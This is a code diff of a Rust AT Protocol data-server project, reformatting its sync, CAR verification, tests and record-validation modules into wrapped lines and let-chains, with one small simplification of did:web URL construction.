··· 1 + use chrono::{DateTime, Utc}; 1 2 use serde::{Deserialize, Serialize}; 2 3 use serde_json::Value; 3 - use chrono::{DateTime, Utc}; 4 4 5 5 #[derive(Debug, Clone, Serialize, Deserialize)] 6 6 pub struct SequencedEvent {
+12 -10
src/sync/frame.rs
··· 1 + use crate::sync::firehose::SequencedEvent; 1 2 use cid::Cid; 2 3 use serde::{Deserialize, Serialize}; 3 4 use std::str::FromStr; 4 - use crate::sync::firehose::SequencedEvent; 5 5 6 6 #[derive(Debug, Serialize, Deserialize)] 7 7 pub struct FrameHeader { ··· 86 86 87 87 impl CommitFrameBuilder { 88 88 pub fn build(self) -> Result<CommitFrame, &'static str> { 89 - let commit_cid = Cid::from_str(&self.commit_cid_str) 90 - .map_err(|_| "Invalid commit CID")?; 91 - let json_ops: Vec<JsonRepoOp> = serde_json::from_value(self.ops_json) 92 - .unwrap_or_else(|_| vec![]); 93 - let ops: Vec<RepoOp> = json_ops.into_iter().map(|op| { 94 - RepoOp { 89 + let commit_cid = Cid::from_str(&self.commit_cid_str).map_err(|_| "Invalid commit CID")?; 90 + let json_ops: Vec<JsonRepoOp> = 91 + serde_json::from_value(self.ops_json).unwrap_or_else(|_| vec![]); 92 + let ops: Vec<RepoOp> = json_ops 93 + .into_iter() 94 + .map(|op| RepoOp { 95 95 action: op.action, 96 96 path: op.path, 97 97 cid: op.cid.and_then(|s| Cid::from_str(&s).ok()), 98 98 prev: op.prev.and_then(|s| Cid::from_str(&s).ok()), 99 - } 100 - }).collect(); 101 - let blobs: Vec<Cid> = self.blobs.iter() 99 + }) 100 + .collect(); 101 + let blobs: Vec<Cid> = self 102 + .blobs 103 + .iter() 102 104 .filter_map(|s| Cid::from_str(s).ok()) 103 105 .collect(); 104 106 let rev = placeholder_rev();
+31 -25
src/sync/import.rs
··· 75 75 .flat_map(|v| find_blob_refs_ipld(v, depth + 1)) 76 76 .collect(), 77 77 Ipld::Map(obj) => { 78 - if let Some(Ipld::String(type_str)) = obj.get("$type") { 79 - if type_str == "blob" { 80 - if let Some(Ipld::Link(link_cid)) = obj.get("ref") { 81 - let mime = obj 82 - .get("mimeType") 83 - .and_then(|v| if let Ipld::String(s) = v { Some(s.clone()) } else { None }); 78 + if let Some(Ipld::String(type_str)) = obj.get("$type") 79 + && type_str == "blob" 80 + && let Some(Ipld::Link(link_cid)) = obj.get("ref") { 81 + let mime = obj.get("mimeType").and_then(|v| { 82 + if let Ipld::String(s) = v { 83 + Some(s.clone()) 84 + } else { 85 + None 86 + } 87 + }); 84 88 return vec![BlobRef { 85 89 cid: link_cid.to_string(), 86 90 mime_type: mime, 87 91 }]; 88 92 } 89 - } 90 - } 91 93 obj.values() 92 94 .flat_map(|v| find_blob_refs_ipld(v, depth + 1)) 93 95 .collect() ··· 106 108 .flat_map(|v| find_blob_refs(v, depth + 1)) 107 109 .collect(), 108 110 JsonValue::Object(obj) => { 109 - if let Some(JsonValue::String(type_str)) = obj.get("$type") { 110 - if type_str == "blob" { 111 - if let Some(JsonValue::Object(ref_obj)) = obj.get("ref") { 112 - if let Some(JsonValue::String(link)) = ref_obj.get("$link") { 111 + if let Some(JsonValue::String(type_str)) = obj.get("$type") 112 + && type_str == "blob" 113 + && let Some(JsonValue::Object(ref_obj)) = obj.get("ref") 114 + && let Some(JsonValue::String(link)) = ref_obj.get("$link") { 113 115 let mime = obj 114 116 .get("mimeType") 115 117 .and_then(|v| v.as_str()) ··· 119 121 mime_type: mime, 120 122 }]; 121 123 } 122 - } 123 - } 124 - } 125 124 obj.values() 126 125 .flat_map(|v| find_blob_refs(v, depth + 1)) 127 126 .collect() ··· 194 193 None 195 194 } 196 195 }); 197 - if let (Some(key), Some(record_cid)) = (key, record_cid) { 198 - if let Some(record_block) = blocks.get(&record_cid) { 199 - if let Ok(record_value) = 196 + if let (Some(key), Some(record_cid)) = (key, record_cid) 197 + && let Some(record_block) = blocks.get(&record_cid) 198 + && let Ok(record_value) = 200 199 serde_ipld_dagcbor::from_slice::<Ipld>(record_block) 201 200 { 202 201 let blob_refs = find_blob_refs_ipld(&record_value, 0); ··· 212 211 }); 213 212 } 214 213 } 215 - } 216 - } 217 214 if let Some(Ipld::Link(tree_cid)) = entry_obj.get("t") { 218 215 stack.push(*tree_cid); 219 216 } ··· 236 233 fn extract_commit_info(commit: &Ipld) -> Result<(Cid, CommitInfo), ImportError> { 237 234 let obj = match commit { 238 235 Ipld::Map(m) => m, 239 - _ => return Err(ImportError::InvalidCommit("Commit must be a map".to_string())), 236 + _ => { 237 + return Err(ImportError::InvalidCommit( 238 + "Commit must be a map".to_string(), 239 + )); 240 + } 240 241 }; 241 242 let data_cid = obj 242 243 .get("data") 243 - .and_then(|d| if let Ipld::Link(cid) = d { Some(*cid) } else { None }) 244 + .and_then(|d| { 245 + if let Ipld::Link(cid) = d { 246 + Some(*cid) 247 + } else { 248 + None 249 + } 250 + }) 244 251 .ok_or_else(|| ImportError::InvalidCommit("Missing data field".to_string()))?; 245 252 let rev = obj.get("rev").and_then(|r| { 246 253 if let Ipld::String(s) = r { ··· 292 299 .fetch_optional(&mut *tx) 293 300 .await 294 301 .map_err(|e| { 295 - if let sqlx::Error::Database(ref db_err) = e { 296 - if db_err.code().as_deref() == Some("55P03") { 302 + if let sqlx::Error::Database(ref db_err) = e 303 + && db_err.code().as_deref() == Some("55P03") { 297 304 return ImportError::ConcurrentModification; 298 305 } 299 - } 300 306 ImportError::Database(e) 301 307 })?; 302 308 if repo.is_none() {
+23 -5
src/sync/listener.rs
··· 43 43 .fetch_all(&state.db) 44 44 .await?; 45 45 if !events.is_empty() { 46 - info!(count = events.len(), from_seq = catchup_start, "Broadcasting catch-up events"); 46 + info!( 47 + count = events.len(), 48 + from_seq = catchup_start, 49 + "Broadcasting catch-up events" 50 + ); 47 51 for event in events { 48 52 let seq = event.seq; 49 53 let _ = state.firehose_tx.send(event); ··· 57 61 let seq_id: i64 = match payload.parse() { 58 62 Ok(id) => id, 59 63 Err(e) => { 60 - warn!("Received invalid payload in repo_updates: '{}'. Error: {}", payload, e); 64 + warn!( 65 + "Received invalid payload in repo_updates: '{}'. Error: {}", 66 + payload, e 67 + ); 61 68 continue; 62 69 } 63 70 }; 64 71 let last_seq = LAST_BROADCAST_SEQ.load(Ordering::SeqCst); 65 72 if seq_id <= last_seq { 66 - debug!(seq = seq_id, last = last_seq, "Skipping already-broadcast event"); 73 + debug!( 74 + seq = seq_id, 75 + last = last_seq, 76 + "Skipping already-broadcast event" 77 + ); 67 78 continue; 68 79 } 69 80 if seq_id > last_seq + 1 { ··· 103 114 if let Some(event) = event { 104 115 match state.firehose_tx.send(event) { 105 116 Ok(receiver_count) => { 106 - debug!(seq = seq_id, receivers = receiver_count, "Broadcast event to firehose"); 117 + debug!( 118 + seq = seq_id, 119 + receivers = receiver_count, 120 + "Broadcast event to firehose" 121 + ); 107 122 } 108 123 Err(e) => { 109 124 warn!(seq = seq_id, error = %e, "Failed to broadcast event (no receivers?)"); ··· 111 126 } 112 127 LAST_BROADCAST_SEQ.store(seq_id, Ordering::SeqCst); 113 128 } else { 114 - warn!(seq = seq_id, "Received notification but could not find row in repo_seq"); 129 + warn!( 130 + seq = seq_id, 131 + "Received notification but could not find row in repo_seq" 132 + ); 115 133 } 116 134 } 117 135 }
+20 -12
src/sync/repo.rs
··· 1 1 use crate::state::AppState; 2 2 use crate::sync::car::encode_car_header; 3 3 use axum::{ 4 + Json, 4 5 extract::{Query, State}, 5 6 http::StatusCode, 6 7 response::{IntoResponse, Response}, 7 - Json, 8 8 }; 9 9 use cid::Cid; 10 10 use ipld_core::ipld::Ipld; ··· 51 51 } 52 52 }; 53 53 if cids.is_empty() { 54 - return (StatusCode::BAD_REQUEST, "No CIDs provided").into_response(); 54 + return (StatusCode::BAD_REQUEST, "No CIDs provided").into_response(); 55 55 } 56 56 let root_cid = cids[0]; 57 57 let header = match encode_car_header(&root_cid) { ··· 70 70 let mut writer = Vec::new(); 71 71 crate::sync::car::write_varint(&mut writer, total_len as u64) 72 72 .expect("Writing to Vec<u8> should never fail"); 73 - writer.write_all(&cid_bytes) 73 + writer 74 + .write_all(&cid_bytes) 74 75 .expect("Writing to Vec<u8> should never fail"); 75 - writer.write_all(&block) 76 + writer 77 + .write_all(&block) 76 78 .expect("Writing to Vec<u8> should never fail"); 77 79 car_bytes.extend_from_slice(&writer); 78 80 } ··· 115 117 .await 116 118 .unwrap_or(None); 117 119 if user_exists.is_none() { 118 - return ( 120 + return ( 119 121 StatusCode::NOT_FOUND, 120 122 Json(json!({"error": "RepoNotFound", "message": "Repo not found"})), 121 123 ) 122 124 .into_response(); 123 125 } else { 124 - return ( 126 + return ( 125 127 StatusCode::NOT_FOUND, 126 128 Json(json!({"error": "RepoNotFound", "message": "Repo not initialized"})), 127 129 ) ··· 157 159 continue; 158 160 } 159 161 visited.insert(cid); 160 - if remaining == 0 { break; } 162 + if remaining == 0 { 163 + break; 164 + } 161 165 remaining -= 1; 162 166 if let Ok(Some(block)) = state.block_store.get(&cid).await { 163 167 let cid_bytes = cid.to_bytes(); ··· 165 169 let mut writer = Vec::new(); 166 170 crate::sync::car::write_varint(&mut writer, total_len as u64) 167 171 .expect("Writing to Vec<u8> should never fail"); 168 - writer.write_all(&cid_bytes) 172 + writer 173 + .write_all(&cid_bytes) 169 174 .expect("Writing to Vec<u8> should never fail"); 170 - writer.write_all(&block) 175 + writer 176 + .write_all(&block) 171 177 .expect("Writing to Vec<u8> should never fail"); 172 178 car_bytes.extend_from_slice(&writer); 173 179 if let Ok(value) = serde_ipld_dagcbor::from_slice::<Ipld>(&block) { ··· 300 306 } 301 307 }; 302 308 let mut proof_blocks: BTreeMap<Cid, bytes::Bytes> = BTreeMap::new(); 303 - if let Err(_) = mst.blocks_for_path(&key, &mut proof_blocks).await { 309 + if mst.blocks_for_path(&key, &mut proof_blocks).await.is_err() { 304 310 return ( 305 311 StatusCode::INTERNAL_SERVER_ERROR, 306 312 Json(json!({"error": "InternalError", "message": "Failed to build proof path"})), ··· 325 331 let mut writer = Vec::new(); 326 332 crate::sync::car::write_varint(&mut writer, total_len as u64) 327 333 .expect("Writing to Vec<u8> should never fail"); 328 - writer.write_all(&cid_bytes) 334 + writer 335 + .write_all(&cid_bytes) 329 336 .expect("Writing to Vec<u8> should never fail"); 330 - writer.write_all(data) 337 + writer 338 + .write_all(data) 331 339 .expect("Writing to Vec<u8> should never fail"); 332 340 car.extend_from_slice(&writer); 333 341 };
+17 -10
src/sync/subscribe_repos.rs
··· 1 1 use crate::state::AppState; 2 2 use crate::sync::firehose::SequencedEvent; 3 - use crate::sync::util::{format_event_for_sending, format_event_with_prefetched_blocks, prefetch_blocks_for_events}; 3 + use crate::sync::util::{ 4 + format_event_for_sending, format_event_with_prefetched_blocks, prefetch_blocks_for_events, 5 + }; 4 6 use axum::{ 5 - extract::{ws::Message, ws::WebSocket, ws::WebSocketUpgrade, Query, State}, 7 + extract::{Query, State, ws::Message, ws::WebSocket, ws::WebSocketUpgrade}, 6 8 response::Response, 7 9 }; 8 10 use futures::{sink::SinkExt, stream::StreamExt}; ··· 53 55 info!(subscribers = count, "Firehose subscriber disconnected"); 54 56 } 55 57 56 - async fn handle_socket_inner(socket: &mut WebSocket, state: &AppState, params: SubscribeReposParams) -> Result<(), ()> { 58 + async fn handle_socket_inner( 59 + socket: &mut WebSocket, 60 + state: &AppState, 61 + params: SubscribeReposParams, 62 + ) -> Result<(), ()> { 57 63 if let Some(cursor) = params.cursor { 58 64 let mut current_cursor = cursor; 59 65 loop { ··· 87 93 }; 88 94 for event in events { 89 95 current_cursor = event.seq; 90 - let bytes = match format_event_with_prefetched_blocks(event, &prefetched).await { 91 - Ok(b) => b, 92 - Err(e) => { 93 - warn!("Failed to format backfill event: {}", e); 94 - return Err(()); 95 - } 96 - }; 96 + let bytes = 97 + match format_event_with_prefetched_blocks(event, &prefetched).await { 98 + Ok(b) => b, 99 + Err(e) => { 100 + warn!("Failed to format backfill event: {}", e); 101 + return Err(()); 102 + } 103 + }; 97 104 if let Err(e) = socket.send(Message::Binary(bytes.into())).await { 98 105 warn!("Failed to send backfill event: {}", e); 99 106 return Err(());
+52 -39
src/sync/util.rs
··· 12 12 use tokio::io::AsyncWriteExt; 13 13 14 14 fn extract_rev_from_commit_bytes(commit_bytes: &[u8]) -> Option<String> { 15 - Commit::from_cbor(commit_bytes).ok().map(|c| c.rev().to_string()) 15 + Commit::from_cbor(commit_bytes) 16 + .ok() 17 + .map(|c| c.rev().to_string()) 16 18 } 17 19 18 20 async fn write_car_blocks( ··· 25 27 let mut writer = CarWriter::new(header, &mut buffer); 26 28 for (cid, data) in other_blocks { 27 29 if cid != commit_cid { 28 - writer.write(cid, data.as_ref()).await 30 + writer 31 + .write(cid, data.as_ref()) 32 + .await 29 33 .map_err(|e| anyhow::anyhow!("writing block {}: {}", cid, e))?; 30 34 } 31 35 } 32 36 if let Some(data) = commit_bytes { 33 - writer.write(commit_cid, data.as_ref()).await 37 + writer 38 + .write(commit_cid, data.as_ref()) 39 + .await 34 40 .map_err(|e| anyhow::anyhow!("writing commit block: {}", e))?; 35 41 } 36 - writer.finish().await 42 + writer 43 + .finish() 44 + .await 37 45 .map_err(|e| anyhow::anyhow!("finalizing CAR: {}", e))?; 38 - buffer.flush().await 46 + buffer 47 + .flush() 48 + .await 39 49 .map_err(|e| anyhow::anyhow!("flushing CAR buffer: {}", e))?; 40 50 Ok(buffer.into_inner()) 41 51 } ··· 83 93 state: &AppState, 84 94 event: &SequencedEvent, 85 95 ) -> Result<Vec<u8>, anyhow::Error> { 86 - let commit_cid_str = event.commit_cid.as_ref() 96 + let commit_cid_str = event 97 + .commit_cid 98 + .as_ref() 87 99 .ok_or_else(|| anyhow::anyhow!("Sync event missing commit_cid"))?; 88 100 let commit_cid = Cid::from_str(commit_cid_str)?; 89 - let commit_bytes = state.block_store.get(&commit_cid).await? 101 + let commit_bytes = state 102 + .block_store 103 + .get(&commit_cid) 104 + .await? 90 105 .ok_or_else(|| anyhow::anyhow!("Commit block not found"))?; 91 106 let rev = extract_rev_from_commit_bytes(&commit_bytes) 92 107 .ok_or_else(|| anyhow::anyhow!("Could not extract rev from commit"))?; ··· 121 136 let block_cids_str = event.blocks_cids.clone().unwrap_or_default(); 122 137 let prev_cid_str = event.prev_cid.clone(); 123 138 let prev_data_cid_str = event.prev_data_cid.clone(); 124 - let mut frame: CommitFrame = event.try_into() 139 + let mut frame: CommitFrame = event 140 + .try_into() 125 141 .map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?; 126 - if let Some(ref pdc) = prev_data_cid_str { 127 - if let Ok(cid) = Cid::from_str(pdc) { 142 + if let Some(ref pdc) = prev_data_cid_str 143 + && let Ok(cid) = Cid::from_str(pdc) { 128 144 frame.prev_data = Some(cid); 129 145 } 130 - } 131 146 let commit_cid = frame.commit; 132 147 let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok()); 133 148 let mut all_cids: Vec<Cid> = block_cids_str ··· 138 153 if !all_cids.contains(&commit_cid) { 139 154 all_cids.push(commit_cid); 140 155 } 141 - if let Some(ref pc) = prev_cid { 142 - if let Ok(Some(prev_bytes)) = state.block_store.get(pc).await { 143 - if let Some(rev) = extract_rev_from_commit_bytes(&prev_bytes) { 156 + if let Some(ref pc) = prev_cid 157 + && let Ok(Some(prev_bytes)) = state.block_store.get(pc).await 158 + && let Some(rev) = extract_rev_from_commit_bytes(&prev_bytes) { 144 159 frame.since = Some(rev); 145 160 } 146 - } 147 - } 148 161 let car_bytes = if !all_cids.is_empty() { 149 162 let fetched = state.block_store.get_many(&all_cids).await?; 150 163 let mut blocks = std::collections::BTreeMap::new(); ··· 182 195 ) -> Result<HashMap<Cid, Bytes>, anyhow::Error> { 183 196 let mut all_cids: Vec<Cid> = Vec::new(); 184 197 for event in events { 185 - if let Some(ref commit_cid_str) = event.commit_cid { 186 - if let Ok(cid) = Cid::from_str(commit_cid_str) { 198 + if let Some(ref commit_cid_str) = event.commit_cid 199 + && let Ok(cid) = Cid::from_str(commit_cid_str) { 187 200 all_cids.push(cid); 188 201 } 189 - } 190 - if let Some(ref prev_cid_str) = event.prev_cid { 191 - if let Ok(cid) = Cid::from_str(prev_cid_str) { 202 + if let Some(ref prev_cid_str) = event.prev_cid 203 + && let Ok(cid) = Cid::from_str(prev_cid_str) { 192 204 all_cids.push(cid); 193 205 } 194 - } 195 206 if let Some(ref block_cids_str) = event.blocks_cids { 196 207 for s in block_cids_str { 197 208 if let Ok(cid) = Cid::from_str(s) { ··· 219 230 event: &SequencedEvent, 220 231 prefetched: &HashMap<Cid, Bytes>, 221 232 ) -> Result<Vec<u8>, anyhow::Error> { 222 - let commit_cid_str = event.commit_cid.as_ref() 233 + let commit_cid_str = event 234 + .commit_cid 235 + .as_ref() 223 236 .ok_or_else(|| anyhow::anyhow!("Sync event missing commit_cid"))?; 224 237 let commit_cid = Cid::from_str(commit_cid_str)?; 225 - let commit_bytes = prefetched.get(&commit_cid) 238 + let commit_bytes = prefetched 239 + .get(&commit_cid) 226 240 .ok_or_else(|| anyhow::anyhow!("Commit block not found in prefetched"))?; 227 241 let rev = extract_rev_from_commit_bytes(commit_bytes) 228 242 .ok_or_else(|| anyhow::anyhow!("Could not extract rev from commit"))?; 229 - let car_bytes = futures::executor::block_on( 230 - write_car_blocks(commit_cid, Some(commit_bytes.clone()), BTreeMap::new()) 231 - )?; 243 + let car_bytes = futures::executor::block_on(write_car_blocks( 244 + commit_cid, 245 + Some(commit_bytes.clone()), 246 + BTreeMap::new(), 247 + ))?; 232 248 let frame = SyncFrame { 233 249 did: event.did.clone(), 234 250 rev, ··· 259 275 let block_cids_str = event.blocks_cids.clone().unwrap_or_default(); 260 276 let prev_cid_str = event.prev_cid.clone(); 261 277 let prev_data_cid_str = event.prev_data_cid.clone(); 262 - let mut frame: CommitFrame = event.try_into() 278 + let mut frame: CommitFrame = event 279 + .try_into() 263 280 .map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?; 264 - if let Some(ref pdc) = prev_data_cid_str { 265 - if let Ok(cid) = Cid::from_str(pdc) { 281 + if let Some(ref pdc) = prev_data_cid_str 282 + && let Ok(cid) = Cid::from_str(pdc) { 266 283 frame.prev_data = Some(cid); 267 284 } 268 - } 269 285 let commit_cid = frame.commit; 270 286 let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok()); 271 287 let mut all_cids: Vec<Cid> = block_cids_str ··· 276 292 if !all_cids.contains(&commit_cid) { 277 293 all_cids.push(commit_cid); 278 294 } 279 - if let Some(commit_bytes) = prefetched.get(&commit_cid) { 280 - if let Some(rev) = extract_rev_from_commit_bytes(commit_bytes) { 295 + if let Some(commit_bytes) = prefetched.get(&commit_cid) 296 + && let Some(rev) = extract_rev_from_commit_bytes(commit_bytes) { 281 297 frame.rev = rev; 282 298 } 283 - } 284 - if let Some(ref pc) = prev_cid { 285 - if let Some(prev_bytes) = prefetched.get(pc) { 286 - if let Some(rev) = extract_rev_from_commit_bytes(prev_bytes) { 299 + if let Some(ref pc) = prev_cid 300 + && let Some(prev_bytes) = prefetched.get(pc) 301 + && let Some(rev) = extract_rev_from_commit_bytes(prev_bytes) { 287 302 frame.since = Some(rev); 288 303 } 289 - } 290 - } 291 304 let car_bytes = if !all_cids.is_empty() { 292 305 let mut blocks = BTreeMap::new(); 293 306 let mut commit_bytes_for_car: Option<Bytes> = None;
+16 -18
src/sync/verify.rs
··· 1 1 use bytes::Bytes; 2 2 use cid::Cid; 3 + use jacquard::common::IntoStatic; 3 4 use jacquard::common::types::crypto::PublicKey; 4 5 use jacquard::common::types::did_doc::DidDocument; 5 - use jacquard::common::IntoStatic; 6 6 use jacquard_repo::commit::Commit; 7 7 use reqwest::Client; 8 8 use std::collections::HashMap; ··· 61 61 let root_block = blocks 62 62 .get(root_cid) 63 63 .ok_or_else(|| VerifyError::BlockNotFound(root_cid.to_string()))?; 64 - let commit = Commit::from_cbor(root_block) 65 - .map_err(|e| VerifyError::InvalidCommit(e.to_string()))?; 64 + let commit = 65 + Commit::from_cbor(root_block).map_err(|e| VerifyError::InvalidCommit(e.to_string()))?; 66 66 let commit_did = commit.did().as_str(); 67 67 if commit_did != expected_did { 68 68 return Err(VerifyError::DidMismatch { ··· 133 133 } 134 134 135 135 async fn resolve_web_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> { 136 - let domain = did 137 - .strip_prefix("did:web:") 138 - .ok_or_else(|| VerifyError::DidResolutionFailed("Invalid did:web format".to_string()))?; 136 + let domain = did.strip_prefix("did:web:").ok_or_else(|| { 137 + VerifyError::DidResolutionFailed("Invalid did:web format".to_string()) 138 + })?; 139 139 let domain_decoded = urlencoding::decode(domain) 140 140 .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?; 141 - let url = if domain_decoded.contains(':') || domain_decoded.contains('/') { 142 - format!("https://{}/.well-known/did.json", domain_decoded) 143 - } else { 144 - format!("https://{}/.well-known/did.json", domain_decoded) 145 - }; 141 + let url = format!("https://{}/.well-known/did.json", domain_decoded); 146 142 let response = self 147 143 .http_client 148 144 .get(&url) ··· 205 201 let mut last_full_key: Vec<u8> = Vec::new(); 206 202 for entry in entries { 207 203 if let Ipld::Map(entry_obj) = entry { 208 - let prefix_len = entry_obj.get("p").and_then(|p| match p { 209 - Ipld::Integer(i) => Some(*i as usize), 210 - _ => None, 211 - }).unwrap_or(0); 204 + let prefix_len = entry_obj 205 + .get("p") 206 + .and_then(|p| match p { 207 + Ipld::Integer(i) => Some(*i as usize), 208 + _ => None, 209 + }) 210 + .unwrap_or(0); 212 211 let key_suffix = entry_obj.get("k").and_then(|k| match k { 213 212 Ipld::Bytes(b) => Some(b.clone()), 214 213 Ipld::String(s) => Some(s.as_bytes().to_vec()), ··· 236 235 } 237 236 stack.push(*tree_cid); 238 237 } 239 - if let Some(Ipld::Link(value_cid)) = entry_obj.get("v") { 240 - if !blocks.contains_key(value_cid) { 238 + if let Some(Ipld::Link(value_cid)) = entry_obj.get("v") 239 + && !blocks.contains_key(value_cid) { 241 240 warn!( 242 241 "Record block {} referenced in MST not in CAR (may be expected for partial export)", 243 242 value_cid 244 243 ); 245 244 } 246 - } 247 245 } 248 246 } 249 247 }
+44 -24
src/sync/verify_tests.rs
··· 64 64 let verifier = CarVerifier::new(); 65 65 let empty_node = serde_ipld_dagcbor::to_vec(&serde_json::json!({ 66 66 "e": [] 67 - })).unwrap(); 67 + })) 68 + .unwrap(); 68 69 let cid = make_cid(&empty_node); 69 70 let mut blocks = HashMap::new(); 70 71 blocks.insert(cid, Bytes::from(empty_node)); ··· 106 107 ("p".to_string(), Ipld::Integer(0)), 107 108 ("t".to_string(), Ipld::Link(missing_subtree_cid)), 108 109 ])); 109 - let node = Ipld::Map(std::collections::BTreeMap::from([ 110 - ("e".to_string(), Ipld::List(vec![entry])), 111 - ])); 110 + let node = Ipld::Map(std::collections::BTreeMap::from([( 111 + "e".to_string(), 112 + Ipld::List(vec![entry]), 113 + )])); 112 114 let node_bytes = serde_ipld_dagcbor::to_vec(&node).unwrap(); 113 115 let cid = make_cid(&node_bytes); 114 116 let mut blocks = HashMap::new(); ··· 136 138 ("v".to_string(), Ipld::Link(record_cid)), 137 139 ("p".to_string(), Ipld::Integer(0)), 138 140 ])); 139 - let node = Ipld::Map(std::collections::BTreeMap::from([ 140 - ("e".to_string(), Ipld::List(vec![entry1, entry2])), 141 - ])); 141 + let node = Ipld::Map(std::collections::BTreeMap::from([( 142 + "e".to_string(), 143 + Ipld::List(vec![entry1, entry2]), 144 + )])); 142 145 let node_bytes = serde_ipld_dagcbor::to_vec(&node).unwrap(); 143 146 let cid = make_cid(&node_bytes); 144 147 let mut blocks = HashMap::new(); ··· 171 174 ("v".to_string(), Ipld::Link(record_cid)), 172 175 ("p".to_string(), Ipld::Integer(0)), 173 176 ])); 174 - let node = Ipld::Map(std::collections::BTreeMap::from([ 175 - ("e".to_string(), Ipld::List(vec![entry1, entry2, entry3])), 176 - ])); 177 + let node = Ipld::Map(std::collections::BTreeMap::from([( 178 + "e".to_string(), 179 + Ipld::List(vec![entry1, entry2, entry3]), 180 + )])); 177 181 let node_bytes = serde_ipld_dagcbor::to_vec(&node).unwrap(); 178 182 let cid = make_cid(&node_bytes); 179 183 let mut blocks = HashMap::new(); ··· 187 191 use ipld_core::ipld::Ipld; 188 192 189 193 let verifier = CarVerifier::new(); 190 - let left_node = Ipld::Map(std::collections::BTreeMap::from([ 191 - ("e".to_string(), Ipld::List(vec![])), 192 - ])); 194 + let left_node = Ipld::Map(std::collections::BTreeMap::from([( 195 + "e".to_string(), 196 + Ipld::List(vec![]), 197 + )])); 193 198 let left_node_bytes = serde_ipld_dagcbor::to_vec(&left_node).unwrap(); 194 199 let left_cid = make_cid(&left_node_bytes); 195 200 let root_node = Ipld::Map(std::collections::BTreeMap::from([ ··· 210 215 let verifier = CarVerifier::new(); 211 216 let node = serde_ipld_dagcbor::to_vec(&serde_json::json!({ 212 217 "e": [] 213 - })).unwrap(); 218 + })) 219 + .unwrap(); 214 220 let cid = make_cid(&node); 215 221 let mut blocks = HashMap::new(); 216 222 blocks.insert(cid, Bytes::from(node)); ··· 235 241 let verifier = CarVerifier::new(); 236 242 let record_cid = make_cid(b"record"); 237 243 let entry1 = Ipld::Map(std::collections::BTreeMap::from([ 238 - ("k".to_string(), Ipld::Bytes(b"app.bsky.feed.post/abc".to_vec())), 244 + ( 245 + "k".to_string(), 246 + Ipld::Bytes(b"app.bsky.feed.post/abc".to_vec()), 247 + ), 239 248 ("v".to_string(), Ipld::Link(record_cid)), 240 249 ("p".to_string(), Ipld::Integer(0)), 241 250 ])); ··· 249 258 ("v".to_string(), Ipld::Link(record_cid)), 250 259 ("p".to_string(), Ipld::Integer(19)), 251 260 ])); 252 - let node = Ipld::Map(std::collections::BTreeMap::from([ 253 - ("e".to_string(), Ipld::List(vec![entry1, entry2, entry3])), 254 - ])); 261 + let node = Ipld::Map(std::collections::BTreeMap::from([( 262 + "e".to_string(), 263 + Ipld::List(vec![entry1, entry2, entry3]), 264 + )])); 255 265 let node_bytes = serde_ipld_dagcbor::to_vec(&node).unwrap(); 256 266 let cid = make_cid(&node_bytes); 257 267 let mut blocks = HashMap::new(); 258 268 blocks.insert(cid, Bytes::from(node_bytes)); 259 269 let result = verifier.verify_mst_structure(&cid, &blocks); 260 - assert!(result.is_ok(), "Prefix-compressed keys should be validated correctly"); 270 + assert!( 271 + result.is_ok(), 272 + "Prefix-compressed keys should be validated correctly" 273 + ); 261 274 } 262 275 263 276 #[test] ··· 267 280 let verifier = CarVerifier::new(); 268 281 let record_cid = make_cid(b"record"); 269 282 let entry1 = Ipld::Map(std::collections::BTreeMap::from([ 270 - ("k".to_string(), Ipld::Bytes(b"app.bsky.feed.post/xyz".to_vec())), 283 + ( 284 + "k".to_string(), 285 + Ipld::Bytes(b"app.bsky.feed.post/xyz".to_vec()), 286 + ), 271 287 ("v".to_string(), Ipld::Link(record_cid)), 272 288 ("p".to_string(), Ipld::Integer(0)), 273 289 ])); ··· 276 292 ("v".to_string(), Ipld::Link(record_cid)), 277 293 ("p".to_string(), Ipld::Integer(19)), 278 294 ])); 279 - let node = Ipld::Map(std::collections::BTreeMap::from([ 280 - ("e".to_string(), Ipld::List(vec![entry1, entry2])), 281 - ])); 295 + let node = Ipld::Map(std::collections::BTreeMap::from([( 296 + "e".to_string(), 297 + Ipld::List(vec![entry1, entry2]), 298 + )])); 282 299 let node_bytes = serde_ipld_dagcbor::to_vec(&node).unwrap(); 283 300 let cid = make_cid(&node_bytes); 284 301 let mut blocks = HashMap::new(); 285 302 blocks.insert(cid, Bytes::from(node_bytes)); 286 303 let result = verifier.verify_mst_structure(&cid, &blocks); 287 - assert!(result.is_err(), "Unsorted prefix-compressed keys should fail validation"); 304 + assert!( 305 + result.is_err(), 306 + "Unsorted prefix-compressed keys should fail validation" 307 + ); 288 308 let err = result.unwrap_err(); 289 309 assert!(matches!(err, VerifyError::MstValidationFailed(_))); 290 310 }
+4 -1
src/util.rs
··· 58 58 .ok_or(DbLookupError::NotFound) 59 59 } 60 60 61 - pub async fn get_user_by_identifier(db: &PgPool, identifier: &str) -> Result<UserInfo, DbLookupError> { 61 + pub async fn get_user_by_identifier( 62 + db: &PgPool, 63 + identifier: &str, 64 + ) -> Result<UserInfo, DbLookupError> { 62 65 sqlx::query_as!( 63 66 UserInfo, 64 67 "SELECT id, did, handle FROM users WHERE did = $1 OR handle = $1",
+89 -52
src/validation/mod.rs
··· 53 53 record: &Value, 54 54 collection: &str, 55 55 ) -> Result<ValidationStatus, ValidationError> { 56 - let obj = record 57 - .as_object() 58 - .ok_or_else(|| ValidationError::InvalidRecord("Record must be an object".to_string()))?; 56 + let obj = record.as_object().ok_or_else(|| { 57 + ValidationError::InvalidRecord("Record must be an object".to_string()) 58 + })?; 59 59 let record_type = obj 60 60 .get("$type") 61 61 .and_then(|v| v.as_str()) ··· 103 103 if grapheme_count > 3000 { 104 104 return Err(ValidationError::InvalidField { 105 105 path: "text".to_string(), 106 - message: format!("Text exceeds maximum length of 3000 characters (got {})", grapheme_count), 106 + message: format!( 107 + "Text exceeds maximum length of 3000 characters (got {})", 108 + grapheme_count 109 + ), 107 110 }); 108 111 } 109 112 } 110 - if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) { 111 - if langs.len() > 3 { 113 + if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) 114 + && langs.len() > 3 { 112 115 return Err(ValidationError::InvalidField { 113 116 path: "langs".to_string(), 114 117 message: "Maximum 3 languages allowed".to_string(), 115 118 }); 116 119 } 117 - } 118 120 